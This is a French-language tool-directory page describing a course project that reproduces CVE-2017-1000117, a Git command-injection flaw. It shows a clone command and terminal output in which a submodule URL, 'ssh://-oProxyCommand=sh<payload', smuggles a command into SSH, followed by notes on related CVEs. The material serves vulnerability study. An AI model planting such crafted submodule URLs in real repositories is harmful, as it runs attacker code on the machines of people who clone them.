Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-1000117 — CVE-2017-1000117漏洞复现(PoC+Exp) | Kitploit
Outils/GitHubGitHub/anonymking/cve-2017-1000117
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117漏洞复现(PoC+Exp)

Voir le dépôt
32il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-1000117

Présentation du projet

  • L'un des sujets du projet de conception du cours de sécurité réseau
  • Reproduction de la vulnérabilité CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Résumé de la vulnérabilité :

  • Nom de la vulnérabilité : Vulnérabilité d'injection de commande Git
  • Identifiant CNNVD : CNNVD-201708-670
  • Niveau de danger : Modéré
  • Identifiant CVE : CVE-2017-1000117
  • Type de vulnérabilité : Injection de commandes
  • Date de publication : 2017-08-16
  • Type de menace : À distance
  • Date de mise à jour : 2017-10-17
  • Éditeur : git-scm
  • Source de la vulnérabilité : TrevorJay
  • Résumé de la vulnérabilité : Git est un système de contrôle de version distribué gratuit et open source développé par le développeur de logiciels américain Linus Torvalds. Les versions antérieures à Git 2.7.5 contiennent une vulnérabilité de commande. Un attaquant distant peut exploiter cette vulnérabilité à l'aide d'une URL 'ssh://...' spécialement conçue pour exécuter des programmes déjà arrêtés sur n'importe quel appareil.

Processus d'exploitation

  • Installez une version vulnérable de Git (Git pour Linux, Git pour Windows)
  • J'ai choisi la version git-2.12.1 (testée sur Linux et Windows, fonctionne sur les deux). Les liens de téléchargement pour Linux et Windows sont respectivement git-2.12.1.tar.gz, Git-2.12.1-64-bit.tar.bz2
  • Après avoir installé Git, clonez le projet avec les sous-modules : git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
root@kitploit:~
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
  • Lorsque vous voyez apparaître le Bouddha, la vulnérabilité a été reproduite et le code malveillant dans le payload a été exécuté avec succès.

Mise à jour du 21/06/2019 à 10:30

  • En écrivant le rapport, j'ai soudainement découvert que cette vulnérabilité est très similaire à CVE-2018-17456, juste reformulée. Le cœur du problème est que le symbole '-' n'est pas correctement interprété et est traité comme un paramètre, ce qui conduit à l'exécution de code arbitraire.
  • À propos de l'exploitation de la vulnérabilité CVE-2018-17456, consultez cet article de blog : [《Analyse de la vulnérabilité Git Submodule (CVE-2018-17456)》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

Mise à jour du 21/06/2019 à 19:39

  • En recherchant des informations, j'ai trouvé une autre vulnérabilité très similaire : CVE-2018-11235
  • Voici quelques articles de référence sur CVE-2018-11235 : CVE-2018-11235 git RCE, PoC exploit for CVE-2018-11235, Analyse détaillée de la vulnérabilité d'exécution de code à distance Git (CVE-2018-11235)
Télécharger l’outil